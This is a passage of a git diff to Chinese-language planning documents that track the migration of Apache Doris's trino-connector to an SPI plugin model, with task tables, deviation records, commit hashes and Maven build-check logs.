+| 10 | ✅ | 反向 instanceof 已删(P2-T08;commit `ed81a063fe8`)| +| 11 | ✅ | PhysicalPlanTranslator 删 `TrinoConnectorExternalTable` 分支(P2-T08;`ed81a063fe8`)| +| 12 | 🟡 | 单测 ✅(P2-T11;3 类/29 测试 `9bba12a44b2`);回归 `migration_compat` 推迟(P2-T12,DV-003)| +| 13 | ✅ | 删 `datasource/trinoconnector/`(10 文件)+ legacy test(P2-T10;`ed81a063fe8`)。GsonUtils 由批 B 处理 | --- @@ -41,16 +43,17 @@ | 扩展点 | 是否需要 | 实现状态 | 备注 | |---|---|---|---| -| E1 CreateTableRequest | 🟡 | 透传到 Trino connector | Trino 自身 CREATE 透传 | -| E2 Procedures | 🟡 | Trino 有 Procedure SPI | 可考虑桥接到 ConnectorProcedureOps | -| E3 MetaInvalidator | ❌ | n/a | Trino 一般无 push notification | -| E4 Transactions | 🟡 | Trino ConnectorTransactionHandle | 桥接到新 ConnectorTransaction | -| E5 MvccSnapshot | 🟡 | 部分 Trino connector 有 | 视具体 plugin 而定 | +| E1 CreateTableRequest | 🟡 | 透传到 Trino connector | Trino 自身 CREATE 透传(Doris 端走 SPI default throw 即可)| +| E2 Procedures | 🟡 | Trino 有 Procedure SPI | 推迟评估(不在 P2 scope)| +| E3 MetaInvalidator | ❌ | n/a | Trino 一般无 push notification(DEFAULT NOOP 即合)| +| E4 Transactions | 🟡 | Trino ConnectorTransactionHandle | 桥接到新 ConnectorTransaction(P2 不做 write 路径,DEFAULT 即合)| +| E5 MvccSnapshot | 🟡 | 部分 Trino connector 有 | 视具体 plugin;P2 不做 | | E6 VendedCredentials | ❌ | n/a | | | E7 SysTables | ❌ | n/a | | -| E8 ColumnStatistics | 🟡 | Trino 有 column stats | | +| E8 ColumnStatistics | 🟡 | Trino 有 column stats | P2 不做(可推迟)| | E9 Delete/Merge sink | ❌ | 用通用 sink | | -| E10 listPartitions | 🟡 | Trino 有 partition handles | | +| E10 listPartitions | 🟡 | Trino 有 partition handles | DEFAULT empty 即合(Trino 自己 plan-time 处理 partition pruning)| +| **pushdown** | ✅ | applyFilter / applyProjection done(commit `31fb91c5bd3`)| `TrinoConnectorDorisMetadata` 复用 `TrinoPredicateConverter`;`remainingFilter` 保守=原表达式 | --- @@ -74,5 +77,21 @@ ## 进度日志 +### 2026-05-25(晚 ④)— 批 B 完成(fe-core 桥接) +- commit `dfd48725c76`:GsonUtils 三处 Trino registerSubtype atomic-replace 为 registerCompatibleSubtype;PluginDrivenExternalCatalog 新增 `legacyLogTypeToCatalogType` helper 处理 TRINO_CONNECTOR 下划线/连字符 mismatch;PluginDrivenExternalTable 加 trino-connector engine-name 分支 +- 3 files / +29 LOC fe-core;compile + checkstyle + import gate 全绿 +- HANDOFF 校正:T03 不能"只加不删"(撞 RuntimeTypeAdapterFactory label 唯一性);T05 是 duplicate of T03;T10 scope 缩窄(不再碰 GsonUtils) +- **regression window**:batch B → batch C T07 翻闸前,新建 trino 目录无法序列化;批 C 必须紧接批 B 操作 + +### 2026-05-25(晚 ③)— 批 A 完成(fe-connector-trino SPI 补齐) +- commit `31fb91c5bd3`:TrinoConnectorProvider.validateProperties(`trino.connector.name` required check);TrinoDorisConnector.preCreateValidation(调 ensureInitialized 触发 plugin loading);TrinoConnectorDorisMetadata.applyFilter + applyProjection(复用 TrinoPredicateConverter;`remainingFilter` 保守=原表达式 匹配 legacy) +- 3 files / +143 LOC 全 fe-connector-trino;未触 fe-core(严守批 A 边界) +- 单测推 P2-T11 批 E + +### 2026-05-25(晚 ②)— P2 启动 + recon 完成 +- 3 路 Explore subagent 并行 recon 输出(详见 [tasks/P2-trino-connector-migration.md §阶段日志](../tasks/P2-trino-connector-migration.md)) +- 关键修正:dashboard 反向 instanceof "0/2" 为过时数字,实测仅 1 处(PhysicalPlanTranslator:779);fe-connector-trino 模块 "70%" 在 SPI 表面层面其实更接近 95%,真缺只有 validateProperties / preCreateValidation / pushdown 三处 +- 13 task / 5 批次方案敲定,进入编码阶段 + ### 2026-05-24 - 跟踪文件建立。70% 实现已就位,等 P0/P1 完成后启动 P2 整体推动。 diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index cbb49e7d5faabc..53328d2d247d0c 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -13,17 +13,72 @@ ## 📋 索引 -> 时间倒序;当前共 **0** 项。 +> 时间倒序;当前共 **4** 项。 | 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | |---|---|---|---|---| -| _(尚无偏差)_ | | | | | +| DV-004 | T13 用户向安装文档不在本代码仓(在 doris-website 仓) | [tasks/P2 T13](./tasks/P2-trino-connector-migration.md) | 2026-06-04 | 🟢 已修正 | +| DV-003 | T12 回归测试引用不存在的先例/目录且本地不可运行 | [tasks/P2 T12](./tasks/P2-trino-connector-migration.md) | 2026-06-04 | 🟡 推迟 | +| DV-002 | T11 无法 mock Trino plugin;JsonSerializer 非纯单元 | [tasks/P2 T11](./tasks/P2-trino-connector-migration.md) | 2026-06-04 | 🟢 已修正 | +| DV-001 | 批 D 范围遗漏 ExternalCatalog db 路由 + legacy test | [tasks/P2 T08-T10](./tasks/P2-trino-connector-migration.md) | 2026-06-04 | 🟢 已修正 | --- ## 详细记录(时间倒序) -_(尚无条目)_ +### DV-004 — T13 用户向安装文档不在本代码仓(在 doris-website 仓) + +- **发现日期**:2026-06-04 +- **发现 session / agent**:P2 批 C+D+E session +- **当前状态**:🟢 已修正 +- **原计划位置**:[tasks/P2 §P2-T13](./tasks/P2-trino-connector-migration.md):「`docs-next/` 加 trino-connector 插件安装步骤」 +- **偏差描述**:原计划假设本代码仓有 `docs-next/`;实际本仓只有 `docs/`,用户向文档(docs-next / i18n)在独立的 doris-website 仓。 +- **新方案**:T13 在本 PR 内只同步 plan-doc 跟踪文档;用户向安装文档另在 doris-website 仓提交。 +- **影响范围**:文档 — 本仓只更新 plan-doc;website 仓待办。代码/计划 — 无。 +- **关联**:P2-T13 +- **后续动作**:[ ] 在 doris-website 仓补 trino-connector 插件安装文档 + +### DV-003 — T12 迁移兼容回归测试:先例与目标目录均不存在,且本地不可运行 + +- **发现日期**:2026-06-04 +- **发现 session / agent**:P2 批 C+D+E session +- **当前状态**:🟡 推迟 +- **原计划位置**:[tasks/P2 §P2-T12](./tasks/P2-trino-connector-migration.md):「类似 P0 的 ES/JDBC migration compat;放入 `regression-test/suites/external_catalog/`」 +- **偏差描述**:(1) 不存在「P0 ES/JDBC migration_compat」先例套件;(2) 不存在 `external_catalog/` 目录(实际为 `external_table_p0/` 与 `external_table_p2/`);(3) 该测试需真实 Trino plugin + 外部数据源 + 运行集群,本开发环境无 docker/集群,无法编写后验证。 +- **触发场景**:批 E 启动 T12 时 recon 发现。 +- **新方案**:推迟到有 Trino plugin + docker/集群的环境再编写并验证;不往本 PR 加无法验证的套件。 +- **替代方案**:盲写 groovy 放 `external_table_p0/trino_connector/` 但本地不可验证——否决(违反"测试要可验证")。 +- **影响范围**:测试 — 迁移 image 兼容回归缺位(现有 trino_connector 功能套件仍在)。代码/计划 — 无。 +- **关联**:P2-T12、R-001(image 兼容回归风险) +- **后续动作**:[ ] 集群/CI 环境补 `trino_connector_migration_compat`(CREATE CATALOG→image→重启读回 + 旧 image 含 `TRINO_CONNECTOR` 枚举反序列化) + +### DV-002 — T11 单测无法 mock Trino plugin;`TrinoJsonSerializer` 非纯单元 + +- **发现日期**:2026-06-04 +- **发现 session / agent**:P2 批 C+D+E session +- **当前状态**:🟢 已修正(commit `9bba12a44b2`) +- **原计划位置**:[tasks/P2 §P2-T11](./tasks/P2-trino-connector-migration.md):「最少 4 个 test class(schema / predicate / type-map / json);mock Trino plugin」 +- **偏差描述**:(1) fe-connector-trino 仅依赖 junit-jupiter,无 Mockito;(2) `TrinoJsonSerializer` 构造需 `HandleResolver` + Trino `TypeRegistry`(来自已加载 plugin 的 `TrinoBootstrap`),非纯单元;(3) schema / applyFilter / preCreateValidation 需活的 connector。无 plugin 无法在单测覆盖。 +- **触发场景**:T11 启动、读 3 个 SUT 源码时发现。 +- **新方案**:写 3 个纯转换器 JUnit5 测试(`TrinoPredicateConverterTest` 14 / `TrinoTypeMappingTest` 11 / `TrinoConnectorProviderTest`=validateProperties 4 = 29 测试),本地 `mvn test` 全绿、不需 plugin;砍掉 json/schema,用 `validateProperties`(批 A T01)替补第 3 类。plugin 依赖路径由现有 `external_table_p0/p2` trino_connector regression 套件覆盖。 +- **替代方案**:引 Mockito mock Trino connector 测 pushdown/metadata——否决(偏离 module 现有约定、脆弱、费时)。 +- **影响范围**:测试 — 单测覆盖纯转换逻辑;集成路径靠 regression。代码/计划 — 无。 +- **关联**:P2-T11、P2-T02 +- **后续动作**:(无;plugin 路径覆盖见 T12 follow-up) + +### DV-001 — 批 D(删 legacy)范围遗漏 `ExternalCatalog` db 路由与 legacy 测试 + +- **发现日期**:2026-06-04 +- **发现 session / agent**:P2 批 C+D+E session +- **当前状态**:🟢 已修正(commit `ed81a063fe8`) +- **原计划位置**:[tasks/P2 §P2-T08..T10](./tasks/P2-trino-connector-migration.md) / HANDOFF:批 D 只列 T08(translator 分支)+ T09(CatalogFactory case)+ T10(删目录) +- **偏差描述**:recon 发现还有两处引用 legacy 目录、计划未列:(1) `ExternalCatalog.java:948` enum switch `case TRINO_CONNECTOR` 实例化 `TrinoConnectorExternalDatabase`;(2) 测试 `fe-core/.../trinoconnector/TrinoConnectorPredicateTest.java` 测被删的 `TrinoConnectorPredicateConverter`。删目录后两者编译失败。另:原 T10 描述「删 GsonUtils 3 个 class-token 注册」已过时(批 B/T03 已 atomic-replace,T10 不碰 GsonUtils)。 +- **触发场景**:批 D 删目录前 `grep datasource.trinoconnector` 全仓 recon。 +- **新方案**:(1) `case TRINO_CONNECTOR` 改返 `PluginDrivenExternalDatabase`(照搬已迁移的 JDBC case line 936)+ 删 import;(2) 删该 legacy 测试(新测试见 T11)。**有意保留** `MetastoreProperties.Type.TRINO_CONNECTOR` + `TrinoConnectorPropertiesFactory`(在 `property/metastore/` 子系统,不引用被删目录,SPI 路径可能仍需)。 +- **替代方案**:`case TRINO_CONNECTOR` 整删落 default 返 null——否决(JDBC 先例显式返 PluginDrivenExternalDatabase,SPI 需要)。 +- **影响范围**:代码 — 已合入批 D commit `ed81a063fe8`。文档 — 本条 + tasks/P2 T10 备注已更正。计划 — 无。 +- **关联**:P2-T08、P2-T09、P2-T10 +- **后续动作**:[ ] 评估 `MetastoreProperties` trino 条目是否真被 SPI 路径使用(若纯死代码可后续清) --- diff --git a/plan-doc/tasks/P2-trino-connector-migration.md b/plan-doc/tasks/P2-trino-connector-migration.md new file mode 100644 index 00000000000000..1f31e8eeb50cdd --- /dev/null +++ b/plan-doc/tasks/P2-trino-connector-migration.md @@ -0,0 +1,197 @@ +# P2 — trino-connector 迁移 + +> 阶段总览见 [00-master-plan §3.3](../00-connector-migration-master-plan.md)。 +> 协作规范见 [AGENT-PLAYBOOK.md](../AGENT-PLAYBOOK.md)。 +> 连接器看板:[connectors/trino-connector.md](../connectors/trino-connector.md)。 + +--- + +## 元信息 + +- **状态**:🚧 进行中(批 A ✅ + 批 B ✅;批 C 翻闸点待操作) +- **启动日期**:2026-05-25 +- **目标完成**:2026-06-08(2 周,master plan §3.3 估算) +- **实际完成**:— +- **阻塞**:无(P0 ✅,P1 ✅) +- **阻塞下游**:本阶段是"首个完整 playbook 实施样板",P3-P7 复用本阶段的流程模板 +- **主 owner**:@me +- **分支**:`catalog-spi-03`(基于 `upstream-apache/branch-catalog-spi`,含 P1 merge `778c5dd610f`) + +--- + +## 阶段目标 + +把 `trino-connector` 完整迁移到 SPI 模式,作为后续 P3-P7 连接器迁移的样板: + +1. **补齐 SPI 实现侧缺口**:在 `fe-connector-trino` 内补 `validateProperties` / `preCreateValidation` / pushdown ops 三处缺失(recon 揭示)。 +2. **接通 fe-core 桥接**:`GsonUtils` 加 string-name redirect;`PluginDrivenExternalCatalog.gsonPostProcess` 加 logType 迁移;`ExternalCatalog.registerCompatibleSubtype`;`PluginDrivenExternalTable.getEngine() / getEngineTableTypeName()` 加 trino 分支。 +3. **翻闸 SPI_READY**:`CatalogFactory.SPI_READY_TYPES` 加 `"trino-connector"`,老 factory 分支只在 fallback 走。 +4. **清旧代码**:删 `PhysicalPlanTranslator` 的 trino-connector instanceof 分支(P1 批 A 已加 SPI fallback 在它之上);删 `CatalogFactory` 中 `case "trino-connector"` + `TrinoConnectorExternalCatalogFactory`;删 `datasource/trinoconnector/` 整目录 + `GsonUtils` 中对应 3 个 class-token subtype 注册(用户决议 Q2,2026-05-25)。 +5. **测试 + 文档**:补 fe-connector-trino 单元测试(0 → ≥ 主路径覆盖);regression-test 加 image 兼容场景;docs-next 加插件安装文档;同步看板 + PROGRESS。 + +完成后: + +- `datasource/trinoconnector/` 不再存在 +- `PhysicalPlanTranslator` 无 `TrinoConnector*` import +- `CatalogFactory` 无 `case "trino-connector"` +- 老 FE image 反序列化通过 GsonUtils string-name redirect 落到 `PluginDrivenExternalCatalog` +- fe-connector-trino 模块完成度看板从 70% 翻到 100% + +--- + +## 验收标准 + +从 master plan §3.3 同步(含 recon 揭示的额外项): + +- [ ] `TrinoConnectorProvider.validateProperties` 实现,CREATE CATALOG 阶段即校验 `trino.connector.name` 等必填属性 +- [ ] `TrinoDorisConnector.preCreateValidation` 实现,CREATE CATALOG 时验证 Trino plugin 可加载 +- [ ] `ConnectorPushdownOps.applyFilter` + `applyProjection` 桥接 Trino 原生下推(用户决议 Q1,2026-05-25:纳入 P2 批 A) +- [ ] `GsonUtils.java` 加 3 行 string-name redirect(`TrinoConnectorExternalCatalog` / `Database` / `Table` → 对应 `PluginDriven*`) +- [ ] `PluginDrivenExternalCatalog.gsonPostProcess` 加 `trinoconnector → plugin` logType 迁移分支 +- [ ] `ExternalCatalog.registerCompatibleSubtype` 注册 trino 子类型 +- [ ] `PluginDrivenExternalTable.getEngine() / getEngineTableTypeName()` 加 `case "trino-connector":` 返回 `TRINO_CONNECTOR_EXTERNAL_TABLE` 对应字符串 +- [ ] `CatalogFactory.SPI_READY_TYPES` 加 `"trino-connector"` +- [ ] `PhysicalPlanTranslator.visitPhysicalFileScan` 删 `TrinoConnectorExternalTable` instanceof 分支(P1 批 A 加的 fallback 让位) +- [ ] `CatalogFactory.java` 删 `case "trino-connector":` 分支;删 `TrinoConnectorExternalCatalogFactory.java` 整文件 +- [ ] `fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/` 整目录删除 +- [ ] `GsonUtils.java:402 / 457 / 476` 三个 class-token subtype 注册同步删除(与目录一起清,用户决议 Q2) +- [ ] `TableIf.TableType.TRINO_CONNECTOR_EXTERNAL_TABLE` **保留**(image compat,master plan §3.3 task 2.4 明示) +- [ ] fe-connector-trino 单元测试:schema 解析 / predicate 转换 / type mapping / json ser-deser(最少 4 个 test class) +- [~] regression-test `trino_connector_migration_compat`:**推迟**(本环境无集群/plugin/docker;转 CI follow-up,见 DV-003) +- [ ] 现有 trino-connector regression-test 全套通过(需集群环境) +- [~] ~~`docs-next/` 加 trino-connector 插件安装步骤~~:本代码仓无 docs-next,转 doris-website 仓(见 DV-004) +- [x] 看板 + PROGRESS 同步:trino-connector 进度 → 100% +- [x] fe-core 全编译 + checkstyle 0;`mvn -pl fe-connector validate` 通过 import-gate +- [ ] PR CI 全绿(**PR 待开**——`catalog-spi-03` 与 branch-catalog-spi 基线错位,分支对齐由用户处理) + +--- + +## 任务清单 + +> ID 永不复用。批次方案 2026-05-25 用户已确认:批 A=T01+T02(含 pushdown);批 B=T03..T06;批 C=T07;批 D=T08..T10;批 E=T11..T13。 + +| ID | 任务 | 批次 | Owner | 状态 | PR | 启动 | 完成 | 备注 | +|---|---|---|---|---|---|---|---|---| +| P2-T01 | `TrinoConnectorProvider.validateProperties` + `TrinoDorisConnector.preCreateValidation` | **批 A** | @me | ✅ | — | 2026-05-25 | 2026-05-25 | required-property `trino.connector.name` 校验;preCreateValidation 调 `ensureInitialized()` 触发 plugin 加载 + factory 解析。+20 LOC | +| P2-T02 | `ConnectorPushdownOps.applyFilter` + `applyProjection`(桥接 Trino 原生下推) | **批 A** | @me | ✅ | — | 2026-05-25 | 2026-05-25 | `TrinoConnectorDorisMetadata` 复用 `TrinoPredicateConverter`:`ConnectorExpression` → Trino `TupleDomain`,调 Trino native applyFilter/applyProjection,包装新 `TrinoTableHandle`。`remainingFilter` 保守=原表达式,匹配 legacy 行为。+125 LOC;单测推 P2-T11 | +| P2-T03 | `GsonUtils` Trino Catalog/Database/Table 注册替换为 `registerCompatibleSubtype` | **批 B** | @me | ✅ | — | 2026-05-25 | 2026-05-25 | **scope 校正**:必须 atomic replace(delete 旧 `registerSubtype` + add `registerCompatibleSubtype` 同一 commit),否则 `RuntimeTypeAdapterFactory` 在 labelToSubtype 撞名抛 IAE。原 HANDOFF "只加不删" 描述错误。同时移除 3 个 import | +| P2-T04 | `PluginDrivenExternalCatalog.gsonPostProcess` 加 `trinoconnector → plugin` logType 迁移 | **批 B** | @me | ✅ | — | 2026-05-25 | 2026-05-25 | 新增 `legacyLogTypeToCatalogType()` helper;`Type.TRINO_CONNECTOR.name().toLowerCase()` = `"trino_connector"` 不匹配 CatalogFactory 的 `"trino-connector"`,需要显式 case 映射。+15 LOC | +| P2-T05 | ~~`ExternalCatalog.registerCompatibleSubtype` 注册~~(**duplicate of T03**) | **批 B** | @me | ✅ | — | 2026-05-25 | 2026-05-25 | recon 发现 `registerCompatibleSubtype` 只在 `GsonUtils` 上存在(`RuntimeTypeAdapterFactory` 方法),没有 `ExternalCatalog.registerCompatibleSubtype` 这种 API。原任务描述误解;T03 完成时本任务自动满足 | +| P2-T06 | `PluginDrivenExternalTable.getEngine()` + `getEngineTableTypeName()` 加 `case "trino-connector":` 分支 | **批 B** | @me | ✅ | — | 2026-05-25 | 2026-05-25 | **caveat**:`TableType.TRINO_CONNECTOR_EXTERNAL_TABLE.toEngineName()` 因 switch 没有 case 返回 null(legacy 也是 null);保留此 legacy 行为。`getEngineTableTypeName` 返回 `.name()` 正常。+6 LOC | +| P2-T07 | `CatalogFactory.SPI_READY_TYPES` 加 `"trino-connector"` | **批 C** | @me | ✅ | — | 2026-06-04 | 2026-06-04 | commit `0fe4b8a93d6`。`CatalogFactory.java:53` 加 `"trino-connector"`;顺手删上方注释里过时的 trino-connector 列举。翻闸点 | +| P2-T08 | `PhysicalPlanTranslator.visitPhysicalFileScan` 删 `instanceof TrinoConnectorExternalTable` 分支 | **批 D** | @me | ✅ | — | 2026-06-04 | 2026-06-04 | commit `ed81a063fe8`。删 else-if 分支 + 2 个 import;`PluginDrivenExternalTable` SPI 前置分支接管 | +| P2-T09 | `CatalogFactory` 删 `case "trino-connector":` + import | **批 D** | @me | ✅ | — | 2026-06-04 | 2026-06-04 | commit `ed81a063fe8`。factory 文件在 `trinoconnector/` 目录内,随 T10 删 | +| P2-T10 | 删 `datasource/trinoconnector/` 全目录(10 文件)+ 删 legacy test | **批 D** | @me | ✅ | — | 2026-06-04 | 2026-06-04 | commit `ed81a063fe8`。**GsonUtils 不再碰**(批 B/T03 已 atomic-replace);额外删 `TrinoConnectorPredicateTest`(测的是被删的 converter)。**保留** `TableType.TRINO_CONNECTOR_EXTERNAL_TABLE` + `InitCatalogLog.Type.TRINO_CONNECTOR` 枚举。详见 DV-001 | +| P2-T11 | `fe-connector-trino/src/test/` 单元测试 | **批 E** | @me | ✅ | — | 2026-06-04 | 2026-06-04 | commit `9bba12a44b2`。3 个 JUnit5 类 / 29 测试全绿:PredicateConverter(14) / TypeMapping(11) / Provider.validateProperties(4)。**无 mock**;json/schema 砍掉(JsonSerializer 非纯单元,需 plugin);plugin 依赖路径由 regression 套件覆盖。详见 DV-002 | +| P2-T12 | regression-test `trino_connector_migration_compat`(旧 FE image 反序列化) | **批 E** | @me | 🟡 | — | — | — | **推迟**:本环境无集群/plugin/docker 跑不了;task 引用的 P0 ES/JDBC 先例与 `external_catalog/` 目录均不存在。转 CI/集群 follow-up。详见 DV-003 | +| P2-T13 | 同步跟踪文档(PROGRESS / connectors / HANDOFF / deviations)+ 开 PR | **批 E** | @me | ✅ | — | 2026-06-04 | 2026-06-04 | 跟踪文档已同步。docs-next 安装文档不在本代码仓(在 doris-website 仓),另行处理,详见 DV-004。**PR 待开**——`catalog-spi-03` 现基于 master、与 branch-catalog-spi 基线错位(191-commit diff),分支对齐由用户处理 | + +**状态图例**:⏳ pending / 🚧 in_progress / ✅ done / ❌ blocked / 🚫 deleted + +--- + +## 阶段日志(倒序) + +### 2026-06-04 — 批 C+D+E 完成(T07–T11, T13;T12 推迟;PR 待开) + +> rebase 后续作:用户把 `catalog-spi-03` rebase 到新 master。**构建坑(非代码问题)**:rebase 后 fe-core 编译报 `DorisParser cannot find symbol`——上游 #63823 把 nereids 语法拆到新模块 `fe-sql-parser`,但 `fe-core/target` 里残留旧生成的 `DorisParser.java`(FQCN 撞名,盖过依赖里的新版)。`clean` fe-core(删 stale 生成物,fe-core 已无 grammar 不会再生成)即解。 + +- **批 C / T07**(`0fe4b8a93d6`):`CatalogFactory.SPI_READY_TYPES` 加 `"trino-connector"`(翻闸)。compile + checkstyle 绿。 +- **批 D / T08-T10**(`ed81a063fe8`,14 文件 / +1/−2508):删 `PhysicalPlanTranslator` trino 分支、`CatalogFactory` case、`trinoconnector/` 目录(10 文件)+ legacy 测试。**recon 补回 HANDOFF 漏项(DV-001)**:`ExternalCatalog.java:948` `case TRINO_CONNECTOR` 改返 `PluginDrivenExternalDatabase`(照搬已迁移的 JDBC case)。**保留**:`MetastoreProperties` trino 条目(属性子系统,非 legacy 目录,SPI 仍可能需要)、两个 image-compat 枚举、GsonUtils redirect。守门:clean test-compile(main+test)+ checkstyle + import-gate 全绿。 +- **批 E / T11**(`9bba12a44b2`):3 个 JUnit5 纯转换器测试 / 29 测试全绿(**DV-002**:fe-connector-trino 无 Mockito、`TrinoJsonSerializer` 非纯单元需 plugin → 砍 json/schema、改测 `validateProperties`)。 +- **T12 推迟**(**DV-003**:无集群/plugin/docker;task 引用的 P0 先例与 `external_catalog/` 目录不存在)。 +- **T13**:跟踪文档同步(本条 + PROGRESS / connectors / HANDOFF / deviations)。docs-next 不在本仓(**DV-004**)。 +- **PR 待开**:`catalog-spi-03` 现基于 master、与远端 `branch-catalog-spi`(仍停在 P1 `778c5dd610f`,两者分叉于 `#63552 68d4eb308e5`)错位,`branch-catalog-spi..HEAD` = 191 commit(仅顶部 7 个是 P2)。**不开错误巨型 PR**;用户处理分支对齐后再开(推荐:从远端 branch-catalog-spi 拉新分支,cherry-pick 7 个 P2 commit)。 + +### 2026-05-25(晚 ④)— 批 B 完成(T03 + T04 + T05 + T06 fe-core 桥接) + +**recon 校正**(HANDOFF 描述误差): + +- **T03 不能"只加不删"**:`RuntimeTypeAdapterFactory.registerSubtype`(fe-common line 237)和 `registerCompatibleSubtype`(line 279)都做 `labelToSubtype.containsKey(label) → throw IAE`。如果保留 `registerSubtype(TrinoConnectorExternalCatalog.class, "TrinoConnectorExternalCatalog")` 同时加 `registerCompatibleSubtype(PluginDrivenExternalCatalog.class, "TrinoConnectorExternalCatalog")`,static init 阶段直接 IAE,FE 起不来。**正确做法**:atomic replace — 一个 commit 内 delete 旧的 + add 新的,对 Catalog/Database/Table 三处都如此。ES/JDBC 在历史 commit `5c325655b8b` 就是这么干的。**T10 在批 D 不再需要碰 GsonUtils**,只删 `datasource/trinoconnector/` 目录 + `CatalogFactory` 相关 case 即可。 +- **T05 是 duplicate of T03**:`registerCompatibleSubtype` 只在 `RuntimeTypeAdapterFactory` 上存在,由 `GsonUtils` 调用;没有 `ExternalCatalog.registerCompatibleSubtype` 这种 API。原任务描述基于错误假设。T03 完成 = T05 自动完成。 +- **T04 `name().toLowerCase()` 不通用**:`Type.TRINO_CONNECTOR.name().toLowerCase()` 产出 `"trino_connector"`(下划线),但 `CatalogFactory.java:147` 期望 `"trino-connector"`(连字符)。ES("es")和 JDBC("jdbc")刚好匹配,纯属巧合。必须做显式 case 映射;提取 `legacyLogTypeToCatalogType()` helper 方便未来 MaxCompute 等加 case。 +- **T06 `toEngineName()` 返 null**:`TableType.TRINO_CONNECTOR_EXTERNAL_TABLE.toEngineName()` 在 `TableIf.java:225-273` switch 没有 case,落到 default 返 null。legacy `TrinoConnectorExternalTable` 也没 override `getEngine`,因此 legacy 用户看到的就是 null。保留此行为(不修 toEngineName)。 + +**实施细节**: + +- **T03** `GsonUtils.java`: + - delete `registerSubtype(TrinoConnectorExternalCatalog.class, ...)` line 401-402(Catalog adapter factory) + - delete `registerSubtype(TrinoConnectorExternalDatabase.class, ...)` line 457(Database adapter factory) + - delete `registerSubtype(TrinoConnectorExternalTable.class, ...)` line 476(Table adapter factory) + - add `.registerCompatibleSubtype(PluginDrivenExternalCatalog.class, "TrinoConnectorExternalCatalog")` 紧接 JDBC redirect 之后 + - add `.registerCompatibleSubtype(PluginDrivenExternalDatabase.class, "TrinoConnectorExternalDatabase")` 紧接 JDBC database redirect 之后 + - add `.registerCompatibleSubtype(PluginDrivenExternalTable.class, "TrinoConnectorExternalTable")` 紧接 JDBC table redirect 之后 + - remove 3 个 import(`org.apache.doris.datasource.trinoconnector.{TrinoConnectorExternalCatalog,Database,Table}`) +- **T04** `PluginDrivenExternalCatalog.java`: + - `gsonPostProcess` 把 `logType.name().toLowerCase(Locale.ROOT)` 替换为 `legacyLogTypeToCatalogType(logType)` + - 新增 private static helper `legacyLogTypeToCatalogType(Type) → String`,case TRINO_CONNECTOR 返 `"trino-connector"`,default 走原 `name().toLowerCase()` 路径 +- **T06** `PluginDrivenExternalTable.java`:`getEngine()` 和 `getEngineTableTypeName()` 各加一个 `case "trino-connector":` 分支。getEngine 返 `TRINO_CONNECTOR_EXTERNAL_TABLE.toEngineName()` (null) — 保留 legacy 行为;getEngineTableTypeName 返 `.name()` — 正常。 + +工作树 diff:3 files / +29 LOC,全部 fe-core。 + +守门: +- `mvn -pl fe-core -am compile -Dmaven.build.cache.enabled=false` ✅(cwd=`fe/`;首次冷编译 ~2:44;4646 源文件 SUCCESS) +- `mvn -pl fe-core checkstyle:check -Dmaven.build.cache.enabled=false` ✅(0 violations) +- `mvn -pl fe-connector validate -Dmaven.build.cache.enabled=false` ✅(import gate + checkstyle) + +下一步:批 C T07(`CatalogFactory.SPI_READY_TYPES` 加 `"trino-connector"`)。**重要**:批 B → 批 C 必须连续操作,中间窗口"新建 trino 目录无法序列化"(registerSubtype 已删,但 CatalogFactory 还在走 legacy factory)。 + +### 2026-05-25(晚 ③)— 批 A 完成(T01 + T02) + +实施细节(落到代码): + +- **T01 `TrinoConnectorProvider.validateProperties`**:单一 required-check `trino.connector.name`(ES pattern;JDBC 的多属性校验更重,不适用 trino)。 +- **T01 `TrinoDorisConnector.preCreateValidation(ConnectorValidationContext)`**:直接调用 `ensureInitialized()`。第一次 catalog 创建时触发 `TrinoBootstrap.getInstance(pluginDir)` 单例(包含 plugin 加载)+ 按 `connector.name` 解析 ConnectorFactory + 构造 per-catalog Trino services。把原本延迟到首次 SELECT 的失败("找不到 plugin"、"connector.name 不存在")前移到 CREATE CATALOG 时报错。 +- **T02 `TrinoConnectorDorisMetadata.applyFilter`**:构造 `TrinoPredicateConverter(columnHandleMap, columnMetadataMap)` 把 `ConnectorFilterConstraint.expression` 转 `TupleDomain`;若 `tupleDomain.isAll()` 早返回 empty;否则开 Trino 事务调 `metadata.applyFilter(connSession, trinoTableHandle, new Constraint(tupleDomain))`,把回来的 trino-side handle 重新包装成新的 `TrinoTableHandle`(保留原 columnHandleMap / columnMetadataMap)。**`remainingFilter` 保守返回原 expression**——legacy fe-core scan-node 不剥 conjuncts,BE 端全部 re-evaluate;保留此语义。 +- **T02 `TrinoConnectorDorisMetadata.applyProjection`**:从 `List` 构造 `Map assignments` + `List trinoProjections`;调 Trino native applyProjection;包装新 handle;返回 `ProjectionApplicationResult(handle, List, List)`。SPI 调用方(`PluginDrivenScanNode.tryPushDownProjection`)目前只读 handle,但 projections/assignments 已正确填充以备未来使用。 + +工作树 diff:3 files / +143 LOC,全部在 `fe-connector/fe-connector-trino/src/main/java/`,**未触碰 fe-core**(严守批 A 边界)。 + +守门: +- `mvn -pl fe-connector validate -Dmaven.build.cache.enabled=false` ✅(import gate + checkstyle) +- `mvn -pl fe-connector/fe-connector-trino -am compile -Dmaven.build.cache.enabled=false` ✅ +- `mvn -pl fe-connector/fe-connector-trino checkstyle:check` ✅(0 violations) +- `mvn -pl fe-connector/fe-connector-trino -am test -DfailIfNoTests=false` ✅("No sources to compile" — module 当前 0 测试,T11 批 E 补齐) + +下一步:批 B(T03+T04+T05+T06 fe-core 桥接)。批 D T10 删 GsonUtils 三个 class-token 注册必须与 T03 加新 string-name redirect **同一个 PR**(image compat 强约束)。 + +### 2026-05-25(晚 ②)— P2 启动 + recon 完成 + +新 session 启动 P2,在 `catalog-spi-03` 上工作。Recon 5 个子任务(用 Explore subagent 并行)输出代码侧 facts: + +- **fe-core 旧代码**:`datasource/trinoconnector/` 共 10 个 .java,~1760 LOC(最大头:`TrinoConnectorExternalCatalog` 329 / `TrinoConnectorScanNode` 342 / `TrinoConnectorPredicateConverter` 334);3 个 source 子文件(`TrinoConnectorSource` / `TrinoConnectorSplit` / `TrinoConnectorPredicateConverter`)只被内部引用,无外部 caller。 +- **外部 caller**:5 个 live 引用点,全部是机械路由(无 P1-T01 那种藏起来的活业务逻辑): + - `CatalogFactory.java:148`:`TrinoConnectorExternalCatalogFactory.createCatalog(...)`(T09 删) + - `ExternalCatalog.java:948`:enum switch 实例化 `TrinoConnectorExternalDatabase`(随 